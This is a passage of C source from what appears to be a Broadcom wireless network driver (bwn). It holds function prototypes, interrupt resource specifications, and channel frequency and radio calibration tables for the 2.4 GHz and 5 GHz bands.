uint8_t bwn_dma_check_redzone(struct bwn_dma_ring *, struct mbuf *); static void 
bwn_dma_handle_txeof(struct bwn_mac *, const struct bwn_txstatus *); static int bwn_dma_tx_start(struct bwn_mac *, struct ieee80211_node *, struct mbuf *); static int bwn_dma_getslot(struct bwn_dma_ring *); static struct bwn_dma_ring *bwn_dma_select(struct bwn_mac *, uint8_t); static int bwn_dma_attach(struct bwn_mac *); static struct bwn_dma_ring *bwn_dma_ringsetup(struct bwn_mac *, int, int, int); static struct bwn_dma_ring *bwn_dma_parse_cookie(struct bwn_mac *, const struct bwn_txstatus *, uint16_t, int *); static void bwn_dma_free(struct bwn_mac *); static void bwn_phy_g_init_sub(struct bwn_mac *); static uint8_t bwn_has_hwpctl(struct bwn_mac *); static void bwn_phy_init_b5(struct bwn_mac *); static void bwn_phy_init_b6(struct bwn_mac *); static void bwn_phy_init_a(struct bwn_mac *); static void bwn_loopback_calcgain(struct bwn_mac *); static uint16_t bwn_rf_init_bcm2050(struct bwn_mac *); static void bwn_lo_g_init(struct bwn_mac *); static void bwn_lo_g_adjust(struct bwn_mac *); static void bwn_lo_get_powervector(struct bwn_mac *); static struct bwn_lo_calib *bwn_lo_calibset(struct bwn_mac *, const struct bwn_bbatt *, const struct bwn_rfatt *); static void bwn_lo_write(struct bwn_mac *, struct bwn_loctl *); static void bwn_phy_hwpctl_init(struct bwn_mac *); static void bwn_phy_g_switch_chan(struct bwn_mac *, int, uint8_t); static void bwn_phy_g_set_txpwr_sub(struct bwn_mac *, const struct bwn_bbatt *, const struct bwn_rfatt *, uint8_t); static void bwn_phy_g_set_bbatt(struct bwn_mac *, uint16_t); static uint16_t bwn_rf_2050_rfoverval(struct bwn_mac *, uint16_t, uint32_t); static void bwn_spu_workaround(struct bwn_mac *, uint8_t); static void bwn_wa_init(struct bwn_mac *); static void bwn_ofdmtab_write_2(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static void bwn_dummy_transmission(struct bwn_mac *, int, int); static void bwn_ofdmtab_write_4(struct bwn_mac *, uint16_t, uint16_t, uint32_t); static void bwn_gtab_write(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static void bwn_ram_write(struct bwn_mac *, uint16_t, uint32_t); static void bwn_mac_suspend(struct bwn_mac *); static void bwn_mac_enable(struct bwn_mac *); static void bwn_psctl(struct bwn_mac *, uint32_t); static int16_t bwn_nrssi_read(struct bwn_mac *, uint16_t); static void bwn_nrssi_offset(struct bwn_mac *); static void bwn_nrssi_threshold(struct bwn_mac *); static void bwn_nrssi_slope_11g(struct bwn_mac *); static void bwn_set_all_gains(struct bwn_mac *, int16_t, int16_t, int16_t); static void bwn_set_original_gains(struct bwn_mac *); static void bwn_hwpctl_early_init(struct bwn_mac *); static void bwn_hwpctl_init_gphy(struct bwn_mac *); static uint16_t bwn_phy_g_chan2freq(uint8_t); static int bwn_fw_gets(struct bwn_mac *, enum bwn_fwtype); static int bwn_fw_get(struct bwn_mac *, enum bwn_fwtype, const char *, struct bwn_fwfile *); static void bwn_release_firmware(struct bwn_mac *); static void bwn_do_release_fw(struct bwn_fwfile *); static uint16_t bwn_fwcaps_read(struct bwn_mac *); static int bwn_fwinitvals_write(struct bwn_mac *, const struct bwn_fwinitvals *, size_t, size_t); static int bwn_switch_channel(struct bwn_mac *, int); static uint16_t bwn_ant2phy(int); static void bwn_mac_write_bssid(struct bwn_mac *); static void bwn_mac_setfilter(struct bwn_mac *, uint16_t, const uint8_t *); static void bwn_key_dowrite(struct bwn_mac *, uint8_t, uint8_t, const uint8_t *, size_t, const uint8_t *); static void bwn_key_macwrite(struct bwn_mac *, uint8_t, const uint8_t *); static void bwn_key_write(struct bwn_mac *, 
uint8_t, uint8_t, const uint8_t *); static void bwn_phy_exit(struct bwn_mac *); static void bwn_core_stop(struct bwn_mac *); static int bwn_switch_band(struct bwn_softc *, struct ieee80211_channel *); static void bwn_phy_reset(struct bwn_mac *); static int bwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void bwn_set_pretbtt(struct bwn_mac *); static int bwn_intr(void *); static void bwn_intrtask(void *, int); static void bwn_restart(struct bwn_mac *, const char *); static void bwn_intr_ucode_debug(struct bwn_mac *); static void bwn_intr_tbtt_indication(struct bwn_mac *); static void bwn_intr_atim_end(struct bwn_mac *); static void bwn_intr_beacon(struct bwn_mac *); static void bwn_intr_pmq(struct bwn_mac *); static void bwn_intr_noise(struct bwn_mac *); static void bwn_intr_txeof(struct bwn_mac *); static void bwn_hwreset(void *, int); static void bwn_handle_fwpanic(struct bwn_mac *); static void bwn_load_beacon0(struct bwn_mac *); static void bwn_load_beacon1(struct bwn_mac *); static uint32_t bwn_jssi_read(struct bwn_mac *); static void bwn_noise_gensample(struct bwn_mac *); static void bwn_handle_txeof(struct bwn_mac *, const struct bwn_txstatus *); static void bwn_rxeof(struct bwn_mac *, struct mbuf *, const void *); static void bwn_phy_txpower_check(struct bwn_mac *, uint32_t); static void bwn_start_locked(struct ifnet *); static int bwn_tx_start(struct bwn_softc *, struct ieee80211_node *, struct mbuf *); static int bwn_tx_isfull(struct bwn_softc *, struct mbuf *); static int bwn_set_txhdr(struct bwn_mac *, struct ieee80211_node *, struct mbuf *, struct bwn_txhdr *, uint16_t); static void bwn_plcp_genhdr(struct bwn_plcp4 *, const uint16_t, const uint8_t); static uint8_t bwn_antenna_sanitize(struct bwn_mac *, uint8_t); static uint8_t bwn_get_fbrate(uint8_t); static int bwn_phy_shm_tssi_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_setatt(struct bwn_mac *, int *, int *); static void bwn_phy_lock(struct bwn_mac *); static void bwn_phy_unlock(struct bwn_mac *); static void bwn_rf_lock(struct bwn_mac *); static void bwn_rf_unlock(struct bwn_mac *); static void bwn_txpwr(void *, int); static void bwn_tasks(void *); static void bwn_task_15s(struct bwn_mac *); static void bwn_task_30s(struct bwn_mac *); static void bwn_task_60s(struct bwn_mac *); static int bwn_plcp_get_ofdmrate(struct bwn_mac *, struct bwn_plcp6 *, uint8_t); static int bwn_plcp_get_cckrate(struct bwn_mac *, struct bwn_plcp6 *); static void bwn_rx_radiotap(struct bwn_mac *, struct mbuf *, const struct bwn_rxhdr4 *, struct bwn_plcp6 *, int, int, int); static void bwn_tsf_read(struct bwn_mac *, uint64_t *); static void bwn_phy_g_dc_lookup_init(struct bwn_mac *, uint8_t); static void bwn_set_slot_time(struct bwn_mac *, uint16_t); static void bwn_watchdog(void *); static void bwn_dma_stop(struct bwn_mac *); static void bwn_pio_stop(struct bwn_mac *); static void bwn_dma_ringstop(struct bwn_dma_ring **); static void bwn_led_attach(struct bwn_mac *); static void bwn_led_newstate(struct bwn_mac *, enum ieee80211_state); static void bwn_led_event(struct bwn_mac *, int); static void bwn_led_blink_start(struct bwn_mac *, int, int); static void bwn_led_blink_next(void *); static void bwn_led_blink_end(void *); static void bwn_rfswitch(void *); static void bwn_rf_turnon(struct bwn_mac *); static void bwn_rf_turnoff(struct bwn_mac *); static void bwn_phy_lp_init_pre(struct bwn_mac *); static int bwn_phy_lp_init(struct bwn_mac *); static uint16_t bwn_phy_lp_read(struct bwn_mac *, uint16_t); static void 
bwn_phy_lp_write(struct bwn_mac *, uint16_t, uint16_t); static void bwn_phy_lp_maskset(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static uint16_t bwn_phy_lp_rf_read(struct bwn_mac *, uint16_t); static void bwn_phy_lp_rf_write(struct bwn_mac *, uint16_t, uint16_t); static void bwn_phy_lp_rf_onoff(struct bwn_mac *, int); static int bwn_phy_lp_switch_channel(struct bwn_mac *, uint32_t); static uint32_t bwn_phy_lp_get_default_chan(struct bwn_mac *); static void bwn_phy_lp_set_antenna(struct bwn_mac *, int); static void bwn_phy_lp_task_60s(struct bwn_mac *); static void bwn_phy_lp_readsprom(struct bwn_mac *); static void bwn_phy_lp_bbinit(struct bwn_mac *); static void bwn_phy_lp_txpctl_init(struct bwn_mac *); static void bwn_phy_lp_calib(struct bwn_mac *); static void bwn_phy_lp_switch_analog(struct bwn_mac *, int); static int bwn_phy_lp_b2062_switch_channel(struct bwn_mac *, uint8_t); static int bwn_phy_lp_b2063_switch_channel(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_anafilter(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_gaintbl(struct bwn_mac *, uint32_t); static void bwn_phy_lp_digflt_save(struct bwn_mac *); static void bwn_phy_lp_get_txpctlmode(struct bwn_mac *); static void bwn_phy_lp_set_txpctlmode(struct bwn_mac *, uint8_t); static void bwn_phy_lp_bugfix(struct bwn_mac *); static void bwn_phy_lp_digflt_restore(struct bwn_mac *); static void bwn_phy_lp_tblinit(struct bwn_mac *); static void bwn_phy_lp_bbinit_r2(struct bwn_mac *); static void bwn_phy_lp_bbinit_r01(struct bwn_mac *); static void bwn_phy_lp_b2062_init(struct bwn_mac *); static void bwn_phy_lp_b2063_init(struct bwn_mac *); static void bwn_phy_lp_rxcal_r2(struct bwn_mac *); static void bwn_phy_lp_rccal_r12(struct bwn_mac *); static void bwn_phy_lp_set_rccap(struct bwn_mac *); static uint32_t bwn_phy_lp_roundup(uint32_t, uint32_t, uint8_t); static void bwn_phy_lp_b2062_reset_pllbias(struct bwn_mac *); static void bwn_phy_lp_b2062_vco_calib(struct bwn_mac *); static void bwn_tab_write_multi(struct bwn_mac *, uint32_t, int, const void *); static void bwn_tab_read_multi(struct bwn_mac *, uint32_t, int, void *); static struct bwn_txgain bwn_phy_lp_get_txgain(struct bwn_mac *); static uint8_t bwn_phy_lp_get_bbmult(struct bwn_mac *); static void bwn_phy_lp_set_txgain(struct bwn_mac *, struct bwn_txgain *); static void bwn_phy_lp_set_bbmult(struct bwn_mac *, uint8_t); static void bwn_phy_lp_set_trsw_over(struct bwn_mac *, uint8_t, uint8_t); static void bwn_phy_lp_set_rxgain(struct bwn_mac *, uint32_t); static void bwn_phy_lp_set_deaf(struct bwn_mac *, uint8_t); static int bwn_phy_lp_calc_rx_iq_comp(struct bwn_mac *, uint16_t); static void bwn_phy_lp_clear_deaf(struct bwn_mac *, uint8_t); static void bwn_phy_lp_tblinit_r01(struct bwn_mac *); static void bwn_phy_lp_tblinit_r2(struct bwn_mac *); static void bwn_phy_lp_tblinit_txgain(struct bwn_mac *); static void bwn_tab_write(struct bwn_mac *, uint32_t, uint32_t); static void bwn_phy_lp_b2062_tblinit(struct bwn_mac *); static void bwn_phy_lp_b2063_tblinit(struct bwn_mac *); static int bwn_phy_lp_loopback(struct bwn_mac *); static void bwn_phy_lp_set_rxgain_idx(struct bwn_mac *, uint16_t); static void bwn_phy_lp_ddfs_turnon(struct bwn_mac *, int, int, int, int, int); static uint8_t bwn_phy_lp_rx_iq_est(struct bwn_mac *, uint16_t, uint8_t, struct bwn_phy_lp_iq_est *); static void bwn_phy_lp_ddfs_turnoff(struct bwn_mac *); static uint32_t bwn_tab_read(struct bwn_mac *, uint32_t); static void bwn_phy_lp_set_txgain_dac(struct bwn_mac *, uint16_t); static void 
bwn_phy_lp_set_txgain_pa(struct bwn_mac *, uint16_t); static void bwn_phy_lp_set_txgain_override(struct bwn_mac *); static uint16_t bwn_phy_lp_get_pa_gain(struct bwn_mac *); static uint8_t bwn_nbits(int32_t); static void bwn_phy_lp_gaintbl_write_multi(struct bwn_mac *, int, int, struct bwn_txgain_entry *); static void bwn_phy_lp_gaintbl_write(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_phy_lp_gaintbl_write_r2(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_phy_lp_gaintbl_write_r01(struct bwn_mac *, int, struct bwn_txgain_entry); static void bwn_sysctl_node(struct bwn_softc *); static struct resource_spec bwn_res_spec_legacy[] = { { SYS_RES_IRQ, 0, RF_ACTIVE | RF_SHAREABLE }, { -1, 0, 0 } }; static struct resource_spec bwn_res_spec_msi[] = { { SYS_RES_IRQ, 1, RF_ACTIVE }, { -1, 0, 0 } }; static const struct bwn_channelinfo bwn_chantable_bg = { .channels = { { 2412, 1, 30 }, { 2417, 2, 30 }, { 2422, 3, 30 }, { 2427, 4, 30 }, { 2432, 5, 30 }, { 2437, 6, 30 }, { 2442, 7, 30 }, { 2447, 8, 30 }, { 2452, 9, 30 }, { 2457, 10, 30 }, { 2462, 11, 30 }, { 2467, 12, 30 }, { 2472, 13, 30 }, { 2484, 14, 30 } }, .nchannels = 14 }; static const struct bwn_channelinfo bwn_chantable_a = { .channels = { { 5170, 34, 30 }, { 5180, 36, 30 }, { 5190, 38, 30 }, { 5200, 40, 30 }, { 5210, 42, 30 }, { 5220, 44, 30 }, { 5230, 46, 30 }, { 5240, 48, 30 }, { 5260, 52, 30 }, { 5280, 56, 30 }, { 5300, 60, 30 }, { 5320, 64, 30 }, { 5500, 100, 30 }, { 5520, 104, 30 }, { 5540, 108, 30 }, { 5560, 112, 30 }, { 5580, 116, 30 }, { 5600, 120, 30 }, { 5620, 124, 30 }, { 5640, 128, 30 }, { 5660, 132, 30 }, { 5680, 136, 30 }, { 5700, 140, 30 }, { 5745, 149, 30 }, { 5765, 153, 30 }, { 5785, 157, 30 }, { 5805, 161, 30 }, { 5825, 165, 30 }, { 5920, 184, 30 }, { 5940, 188, 30 }, { 5960, 192, 30 }, { 5980, 196, 30 }, { 6000, 200, 30 }, { 6020, 204, 30 }, { 6040, 208, 30 }, { 6060, 212, 30 }, { 6080, 216, 30 } }, .nchannels = 37 }; static const struct bwn_channelinfo bwn_chantable_n = { .channels = { { 5160, 32, 30 }, { 5170, 34, 30 }, { 5180, 36, 30 }, { 5190, 38, 30 }, { 5200, 40, 30 }, { 5210, 42, 30 }, { 5220, 44, 30 }, { 5230, 46, 30 }, { 5240, 48, 30 }, { 5250, 50, 30 }, { 5260, 52, 30 }, { 5270, 54, 30 }, { 5280, 56, 30 }, { 5290, 58, 30 }, { 5300, 60, 30 }, { 5310, 62, 30 }, { 5320, 64, 30 }, { 5330, 66, 30 }, { 5340, 68, 30 }, { 5350, 70, 30 }, { 5360, 72, 30 }, { 5370, 74, 30 }, { 5380, 76, 30 }, { 5390, 78, 30 }, { 5400, 80, 30 }, { 5410, 82, 30 }, { 5420, 84, 30 }, { 5430, 86, 30 }, { 5440, 88, 30 }, { 5450, 90, 30 }, { 5460, 92, 30 }, { 5470, 94, 30 }, { 5480, 96, 30 }, { 5490, 98, 30 }, { 5500, 100, 30 }, { 5510, 102, 30 }, { 5520, 104, 30 }, { 5530, 106, 30 }, { 5540, 108, 30 }, { 5550, 110, 30 }, { 5560, 112, 30 }, { 5570, 114, 30 }, { 5580, 116, 30 }, { 5590, 118, 30 }, { 5600, 120, 30 }, { 5610, 122, 30 }, { 5620, 124, 30 }, { 5630, 126, 30 }, { 5640, 128, 30 }, { 5650, 130, 30 }, { 5660, 132, 30 }, { 5670, 134, 30 }, { 5680, 136, 30 }, { 5690, 138, 30 }, { 5700, 140, 30 }, { 5710, 142, 30 }, { 5720, 144, 30 }, { 5725, 145, 30 }, { 5730, 146, 30 }, { 5735, 147, 30 }, { 5740, 148, 30 }, { 5745, 149, 30 }, { 5750, 150, 30 }, { 5755, 151, 30 }, { 5760, 152, 30 }, { 5765, 153, 30 }, { 5770, 154, 30 }, { 5775, 155, 30 }, { 5780, 156, 30 }, { 5785, 157, 30 }, { 5790, 158, 30 }, { 5795, 159, 30 }, { 5800, 160, 30 }, { 5805, 161, 30 }, { 5810, 162, 30 }, { 5815, 163, 30 }, { 5820, 164, 30 }, { 5825, 165, 30 }, { 5830, 166, 30 }, { 5840, 168, 30 }, { 5850, 170, 30 }, { 5860, 172, 30 }, { 5870, 
174, 30 }, { 5880, 176, 30 }, { 5890, 178, 30 }, { 5900, 180, 30 }, { 5910, 182, 30 }, { 5920, 184, 30 }, { 5930, 186, 30 }, { 5940, 188, 30 }, { 5950, 190, 30 }, { 5960, 192, 30 }, { 5970, 194, 30 }, { 5980, 196, 30 }, { 5990, 198, 30 }, { 6000, 200, 30 }, { 6010, 202, 30 }, { 6020, 204, 30 }, { 6030, 206, 30 }, { 6040, 208, 30 }, { 6050, 210, 30 }, { 6060, 212, 30 }, { 6070, 214, 30 }, { 6080, 216, 30 }, { 6090, 218, 30 }, { 6100, 220, 30 }, { 6110, 222, 30 }, { 6120, 224, 30 }, { 6130, 226, 30 }, { 6140, 228, 30 } }, .nchannels = 110 }; static const uint8_t bwn_b2063_chantable_data[33][12] = { { 0x6f, 0x3c, 0x3c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6f, 0x2c, 0x2c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6f, 0x1c, 0x1c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6e, 0x1c, 0x1c, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6e, 0xc, 0xc, 0x4, 0x5, 0x5, 0x5, 0x5, 0x77, 0x80, 0x80, 0x70 }, { 0x6a, 0xc, 0xc, 0, 0x2, 0x5, 0xd, 0xd, 0x77, 0x80, 0x20, 0 }, { 0x6a, 0xc, 0xc, 0, 0x1, 0x5, 0xd, 0xc, 0x77, 0x80, 0x20, 0 }, { 0x6a, 0xc, 0xc, 0, 0x1, 0x4, 0xc, 0xc, 0x77, 0x80, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0x1, 0x4, 0xc, 0xc, 0x77, 0x70, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0x1, 0x4, 0xb, 0xc, 0x77, 0x70, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x4, 0xb, 0xb, 0x77, 0x60, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x3, 0xa, 0xb, 0x77, 0x60, 0x20, 0 }, { 0x69, 0xc, 0xc, 0, 0, 0x3, 0xa, 0xa, 0x77, 0x60, 0x20, 0 }, { 0x68, 0xc, 0xc, 0, 0, 0x2, 0x9, 0x9, 0x77, 0x60, 0x20, 0 }, { 0x68, 0xc, 0xc, 0, 0, 0x1, 0x8, 0x8, 0x77, 0x50, 0x10, 0 }, { 0x67, 0xc, 0xc, 0, 0, 0, 0x8, 0x8, 0x77, 0x50, 0x10, 0 }, { 0x64, 0xc, 0xc, 0, 0, 0, 0x2, 0x1, 0x77, 0x20, 0, 0 }, { 0x64, 0xc, 0xc, 0, 0, 0, 0x1, 0x1, 0x77, 0x20, 0, 0 }, { 0x63, 0xc, 0xc, 0, 0, 0, 0x1, 0, 0x77, 0x10, 0, 0 }, { 0x63, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0x10, 0, 0 }, { 0x62, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0x10, 0, 0 }, { 0x62, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x61, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x60, 0xc, 0xc, 0, 0, 0, 0, 0, 0x77, 0, 0, 0 }, { 0x6e, 0xc, 0xc, 0, 0x9, 0xe, 0xf, 0xf, 0x77, 0xc0, 0x50, 0 }, { 0x6e, 0xc, 0xc, 0, 0x9, 0xd, 0xf, 0xf, 0x77, 0xb0, 0x50, 0 }, { 0x6e, 0xc, 0xc, 0, 0x8, 0xc, 0xf, 0xf, 0x77, 0xb0, 0x50, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xc, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xb, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6d, 0xc, 0xc, 0, 0x8, 0xa, 0xf, 0xf, 0x77, 0xa0, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x7, 0x9, 0xf, 0xf, 0x77, 0x90, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x6, 0x8, 0xf, 0xf, 0x77, 0x90, 0x40, 0 }, { 0x6c, 0xc, 0xc, 0, 0x5, 0x8, 0xf, 0xf, 0x77, 0x90, 0x40, 0 } }; static const struct bwn_b206x_chan bwn_b2063_chantable[] = { { 1, 2412, bwn_b2063_chantable_data[0] }, { 2, 2417, bwn_b2063_chantable_data[0] }, { 3, 2422, bwn_b2063_chantable_data[0] }, { 4, 2427, bwn_b2063_chantable_data[1] }, { 5, 2432, bwn_b2063_chantable_data[1] }, { 6, 2437, bwn_b2063_chantable_data[1] }, { 7, 2442, bwn_b2063_chantable_data[1] }, { 8, 2447, bwn_b2063_chantable_data[1] }, { 9, 2452, bwn_b2063_chantable_data[2] }, { 10, 2457, bwn_b2063_chantable_data[2] }, { 11, 2462, bwn_b2063_chantable_data[3] }, { 12, 2467, bwn_b2063_chantable_data[3] }, { 13, 2472, bwn_b2063_chantable_data[3] }, { 14, 2484, bwn_b2063_chantable_data[4] }, { 34, 5170, bwn_b2063_chantable_data[5] }, { 36, 5180, bwn_b2063_chantable_data[6] }, { 38, 5190, bwn_b2063_chantable_data[7] }, { 40, 5200, bwn_b2063_chantable_data[8] }, { 42, 5210, bwn_b2063_chantable_data[9] }, { 44, 5220, 
bwn_b2063_chantable_data[10] }, { 46, 5230, bwn_b2063_chantable_data[11] }, { 48, 5240, bwn_b2063_chantable_data[12] }, { 52, 5260, bwn_b2063_chantable_data[13] }, { 56, 5280, bwn_b2063_chantable_data[14] }, { 60, 5300, bwn_b2063_chantable_data[14] }, { 64, 5320, bwn_b2063_chantable_data[15] }, { 100, 5500, bwn_b2063_chantable_data[16] }, { 104, 5520, bwn_b2063_chantable_data[17] }, { 108, 5540, bwn_b2063_chantable_data[18] }, { 112, 5560, bwn_b2063_chantable_data[19] }, { 116, 5580, bwn_b2063_chantable_data[20] }, { 120, 5600, bwn_b2063_chantable_data[21] }, { 124, 5620, bwn_b2063_chantable_data[21] }, { 128, 5640, bwn_b2063_chantable_data[22] }, { 132, 5660, bwn_b2063_chantable_data[22] }, { 136, 5680, bwn_b2063_chantable_data[22] }, { 140, 5700, bwn_b2063_chantable_data[23] }, { 149, 5745, bwn_b2063_chantable_data[23] }, { 153, 5765, bwn_b2063_chantable_data[23] }, { 157, 5785, bwn_b2063_chantable_data[23] }, { 161, 5805, bwn_b2063_chantable_data[23] }, { 165, 5825, bwn_b2063_chantable_data[23] }, { 184, 4920, bwn_b2063_chantable_data[24] }, { 188, 4940, bwn_b2063_chantable_data[25] }, { 192, 4960, bwn_b2063_chantable_data[26] }, { 196, 4980, bwn_b2063_chantable_data[27] }, { 200, 5000, bwn_b2063_chantable_data[28] }, { 204, 5020, bwn_b2063_chantable_data[29] }, { 208, 5040, bwn_b2063_chantable_data[30] }, { 212, 5060, bwn_b2063_chantable_data[31] }, { 216, 5080, bwn_b2063_chantable_data[32] } }; static const uint8_t bwn_b2062_chantable_data[22][12] = { { 0xff, 0xff, 0xb5, 0x1b, 0x24, 0x32, 0x32, 0x88, 0x88, 0, 0, 0 }, { 0, 0x22, 0x20, 0x84, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x10, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x20, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0x10, 0x84, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x11, 0, 0x83, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x63, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x62, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x30, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x20, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0x10, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0, 0, 0, 0, 0x3c, 0x77, 0x37, 0xff, 0x88, 0, 0, 0 }, { 0x55, 0x77, 0x90, 0xf7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x44, 0x77, 0x80, 0xe7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x44, 0x66, 0x80, 0xe7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x33, 0x66, 0x70, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x55, 0x60, 0xd7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x55, 0x60, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x22, 0x44, 0x50, 0xc7, 0x3c, 0x77, 0x35, 0xff, 0xff, 0, 0, 0 }, { 0x11, 0x44, 0x50, 0xa5, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 }, { 0, 0x44, 0x40, 0xb6, 0x3c, 0x77, 0x35, 0xff, 0x88, 0, 0, 0 } }; static const struct bwn_b206x_chan bwn_b2062_chantable[] = { { 1, 2412, bwn_b2062_chantable_data[0] }, { 2, 2417, bwn_b2062_chantable_data[0] }, { 3, 2422, bwn_b2062_chantable_data[0] }, { 4, 2427, bwn_b2062_chantable_data[0] }, { 5, 2432, bwn_b2062_chantable_data[0] }, { 6, 2437, bwn_b2062_chantable_data[0] }, { 7, 2442, bwn_b2062_chantable_data[0] }, { 8, 2447, bwn_b2062_chantable_data[0] }, { 9, 2452, bwn_b2062_chantable_data[0] }, { 10, 2457, bwn_b2062_chantable_data[0] }, { 11, 2462, bwn_b2062_chantable_data[0] }, { 12, 2467, bwn_b2062_chantable_data[0] }, { 13, 2472, bwn_b2062_chantable_data[0] }, { 14, 2484, bwn_b2062_chantable_data[0] }, { 34, 5170, 
bwn_b2062_chantable_data[1] }, { 38, 5190, bwn_b2062_chantable_data[2] }, { 42, 5210, bwn_b2062_chantable_data[2] }, { 46, 5230, bwn_b2062_chantable_data[3] }, { 36, 5180, bwn_b2062_chantable_data[4] }, { 40, 5200, bwn_b2062_chantable_data[5] }, { 44, 5220, bwn_b2062_chantable_data[6] }, { 48, 5240, bwn_b2062_chantable_data[3] }, { 52, 5260, bwn_b2062_chantable_data[3] }, { 56, 5280, bwn_b2062_chantable_data[3] }, { 60, 5300, bwn_b2062_chantable_data[7] }, { 64, 5320, bwn_b2062_chantable_data[8] }, { 100, 5500, bwn_b2062_chantable_data[9] }, { 104, 5520, bwn_b2062_chantable_data[10] }, { 108, 5540, bwn_b2062_chantable_data[10] }, { 112, 5560, bwn_b2062_chantable_data[10] }, { 116, 5580, bwn_b2062_chantable_data[11] }, { 120, 5600, bwn_b2062_chantable_data[12] }, { 124, 5620, bwn_b2062_chantable_data[12] }, { 128, 5640, bwn_b2062_chantable_data[12] }, { 132, 5660, bwn_b2062_chantable_data[12] }, { 136, 5680, bwn_b2062_chantable_data[12] }, { 140, 5700, bwn_b2062_chantable_data[12] }, { 149, 5745, bwn_b2062_chantable_data[12] }, { 153, 5765, bwn_b2062_chantable_data[12] }, { 157, 5785, bwn_b2062_chantable_data[12] }, { 161, 5805, bwn_b2062_chantable_data[12] }, { 165, 5825, bwn_b2062_chantable_data[12] }, { 184, 4920, bwn_b2062_chantable_data[13] }, { 188, 4940, bwn_b2062_chantable_data[14] }, { 192, 4960, bwn_b2062_chantable_data[15] }, { 196, 4980, bwn_b2062_chantable_data[16] }, { 200, 5000, bwn_b2062_chantable_data[17] }, { 204, 5020, bwn_b2062_chantable_data[18] }, { 208, 5040, bwn_b2062_chantable_data[19] }, { 212, 5060, bwn_b2062_chantable_data[20] }, { 216, 5080, bwn_b2062_chantable_data[21] } }; /* for LP PHY */ static const struct bwn_rxcompco bwn_rxcompco_5354[] = { { 1, -66, 15 }, { 2, -66, 15 }, { 3, -66, 15 }, { 4, -66, 15 }, { 5, -66, 15 }, { 6, -66, 15 }, { 7, -66, 14 }, { 8, -66, 14 }, { 9, -66, 14 }, { 10, -66, 14 }, { 11, -66, 14 }, { 12, -66, 13 }, { 13, -66, 13 }, { 14, -66, 13 }, }; /* for LP PHY */ static const struct bwn_rxcompco bwn_rxcompco_r12[] = { { 1, -64, 13 }, { 2, -64, 13 }, { 3, -64, 13 }, { 4, -64, 13 }, { 5, -64, 12 }, { 6, -64, 12 }, { 7, -64, 12 }, { 8, -64, 12 }, { 9, -64, 12 }, { 10, -64, 11 }, { 11, -64, 11 }, { 12, -64, 11 }, { 13, -64, 11 }, { 14, -64, 10 }, { 34, -62, 24 }, { 38, -62, 24 }, { 42, -62, 24 }, { 46, -62, 23 }, { 36, -62, 24 }, { 40, -62, 24 }, { 44, -62, 23 }, { 48, -62, 23 }, { 52, -62, 23 }, { 56, -62, 22 }, { 60, -62, 22 }, { 64, -62, 22 }, { 100, -62, 16 }, { 104, -62, 16 }, { 108, -62, 15 }, { 112, -62, 14 }, { 116, -62, 14 }, { 120, -62, 13 }, { 124, -62, 12 }, { 128, -62, 12 }, { 132, -62, 12 }, { 136, -62, 11 }, { 140, -62, 10 }, { 149, -61, 9 }, { 153, -61, 9 }, { 157, -61, 9 }, { 161, -61, 8 }, { 165, -61, 8 }, { 184, -62, 25 }, { 188, -62, 25 }, { 192, -62, 25 }, { 196, -62, 25 }, { 200, -62, 25 }, { 204, -62, 25 }, { 208, -62, 25 }, { 212, -62, 25 }, { 216, 